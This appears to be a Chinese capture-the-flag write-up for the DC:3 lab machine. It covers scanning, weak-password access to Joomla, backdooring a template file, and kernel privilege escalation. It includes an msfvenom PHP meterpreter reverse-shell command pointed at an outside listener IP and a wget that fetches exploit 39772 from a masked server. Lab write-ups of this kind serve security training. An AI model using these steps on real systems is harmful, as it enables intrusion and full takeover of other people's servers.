DC:3靶机 通关详解

信息收集

nmap -sS -O 192.168.45.0/24

DC:3靶机 通关详解_第1张图片

nmap -A -p- 192.168.45.134

DC:3靶机 通关详解_第2张图片
访问80端口
DC:3靶机 通关详解_第3张图片
扫个目录
DC:3靶机 通关详解_第4张图片
访问administrator目录,发现是joomla的cms
DC:3靶机 通关详解_第5张图片

拿websehll

顺手尝试弱口令,猜测账号admin
在这里插入图片描述
DC:3靶机 通关详解_第6张图片
在extensions template下有上传点DC:3靶机 通关详解_第7张图片
我直接将error.php改成了后门
然后访问192.168.45.134
蚁剑连上
DC:3靶机 通关详解_第8张图片
在这尝试用nc连接拿稳点的shell在这里插入图片描述
发现没有-e参数 那么用msf连

msfvenom -p php/meterpreter/reverse_tcp lhost=111.67.195.248 lport=9000

生成php代码
在这里插入图片描述
写入网站并访问
在这里插入图片描述

提权

有了稳定的shell后考虑提权
尝试suid提权无果
也没有什么定时任务
sudo也不知道命令,考虑看看系统内核版本
在这里插入图片描述
DC:3靶机 通关详解_第9张图片

searchsploit ubuntu

这里使用39772的那个exp
下载后上传到vps
然后下载到靶机

wget http://xxxxxxxxx/39772.zip

解压完后直接运行
DC:3靶机 通关详解_第10张图片
DC:3靶机 通关详解_第11张图片
结束

你可能感兴趣的:(内网打靶,php,开发语言,网络安全,python)